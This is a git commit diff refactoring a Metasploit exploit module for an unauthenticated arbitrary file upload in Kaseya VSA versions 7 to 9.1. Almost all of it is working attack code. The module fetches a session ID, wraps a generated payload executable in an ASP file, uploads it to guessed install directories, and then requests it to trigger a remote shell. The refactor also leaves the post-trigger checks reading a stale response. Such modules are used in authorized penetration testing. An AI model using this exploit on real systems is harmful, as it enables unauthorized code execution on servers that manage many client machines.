Merge pull request #20 from jvazquez-r7/review_6019

Pedro Ribeiro · Pedro Ribeiro · commit 421a3f9da651 · 2015-10-02T13:41:23.000+02:00
Looks ok, going to test now.
diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb
@@ -16,11 +16,11 @@ def initialize(info = {})
     super(update_info(info,
       'Name' => 'Kaseya VSA uploader.aspx Arbitrary File Upload',
       'Description' => %q{
-This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions between
-7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary directory
-leading to arbitrary code execution with IUSR privileges. This module has been tested with
-Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.
-},
+        This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions
+        between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary
+        directory leading to arbitrary code execution with IUSR privileges. This module has been
+        tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.
+      },
       'Author' =>
         [
           'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
@@ -50,29 +50,31 @@ def check
       'method' => 'GET',
       'uri' => normalize_uri('ConfigTab','uploader.aspx')
     })
-    if res and res.code == 302 and res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
-      return Exploit::CheckCode::Appears
+
+    if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
+      return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Unknown
     end
   end
 
 
-  def upload_file(payload, path, filename, sessionId)
-    print_status("#{peer} - Uploading payload to #{path + 'WebPages\\'}...")
+  def upload_file(payload, path, filename, session_id)
+    print_status("#{peer} - Uploading payload to #{path}...")
+
     res = send_request_cgi({
-      "method" => "POST",
-      'uri' => normalize_uri('ConfigTab','uploader.aspx'),
-      "vars_get" => {
-        "PathData" => path + 'WebPages' + '\\',
-        "qqfile" => filename
+      'method' => 'POST',
+      'uri' => normalize_uri('ConfigTab', 'uploader.aspx'),
+      'vars_get' => {
+        'PathData' => path,
+        'qqfile' => filename
       },
-      "data" => payload,
-      "ctype" => "application/octet-stream",
-      "cookie" => "sessionId=" + sessionId
+      'data' => payload,
+      'ctype' => 'application/octet-stream',
+      'cookie' => 'sessionId=' + session_id
     })
 
-    if res and res.code == 200 and res.body.to_s =~ /"success": "true"/
+    if res && res.code == 200 && res.body && res.body.to_s.include?('"success": "true"')
       return true
     else
       return false
@@ -85,40 +87,46 @@ def exploit
       'method' => 'GET',
       'uri' => normalize_uri('ConfigTab','uploader.aspx')
     })
-    if res and res.code == 302 and res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
-      sessionId = $1
-
-      asp_name = "#{rand_text_alpha_lower(8)}.asp"
-      exe = generate_payload_exe
-      payload = Msf::Util::EXE.to_exe_asp(exe).to_s
-
-      paths = [
-        # We have to guess the path, so just try the most common directories
-        'C:\\Kaseya\\',
-        'C:\\Program Files\\Kaseya\\',
-        'C:\\Program Files (x86)\\Kaseya\\',
-        'D:\\Kaseya\\',
-        'D:\\Program Files\\Kaseya\\',
-        'D:\\Program Files (x86)\\Kaseya\\',
-        'E:\\Kaseya\\',
-        'E:\\Program Files\\Kaseya\\',
-        'E:\\Program Files (x86)\\Kaseya\\',
-      ]
-
-      for path in paths
-        if upload_file(payload, path, asp_name, sessionId)
-          register_files_for_cleanup(path + "WebPages\\" + asp_name)
-          print_status("#{peer} - Executing payload #{asp_name}")
-          res = send_request_cgi({
-            'uri' => normalize_uri(asp_name),
-            'method' => 'GET'
-          })
-          handler
-          break
-        end
-      end
+
+    if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
+      session_id = $1
     else
       fail_with(Failure::NoAccess, "#{peer} - Failed to create a valid session")
     end
+
+    asp_name = "#{rand_text_alpha_lower(8)}.asp"
+    exe = generate_payload_exe
+    payload = Msf::Util::EXE.to_exe_asp(exe).to_s
+
+    paths = [
+      # We have to guess the path, so just try the most common directories
+      'C:\\Kaseya\\WebPages\\',
+      'C:\\Program Files\\Kaseya\\WebPages\\',
+      'C:\\Program Files (x86)\\Kaseya\\WebPages\\',
+      'D:\\Kaseya\\WebPages\\',
+      'D:\\Program Files\\Kaseya\\WebPages\\',
+      'D:\\Program Files (x86)\\Kaseya\\WebPages\\',
+      'E:\\Kaseya\\WebPages\\',
+      'E:\\Program Files\\Kaseya\\WebPages\\',
+      'E:\\Program Files (x86)\\Kaseya\\WebPages\\',
+    ]
+
+    paths.each do |path|
+      if upload_file(payload, path, asp_name, session_id)
+        register_files_for_cleanup(path + asp_name)
+        print_status("#{peer} - Executing payload #{asp_name}")
+
+        send_request_cgi({
+          'uri' => normalize_uri(asp_name),
+          'method' => 'GET'
+        })
+
+        # Failure. The request timed out or the server went away.
+        break if res.nil?
+        # Success! Triggered the payload, should have a shell incoming
+        break if res.code == 200
+      end
+    end
+
   end
 end
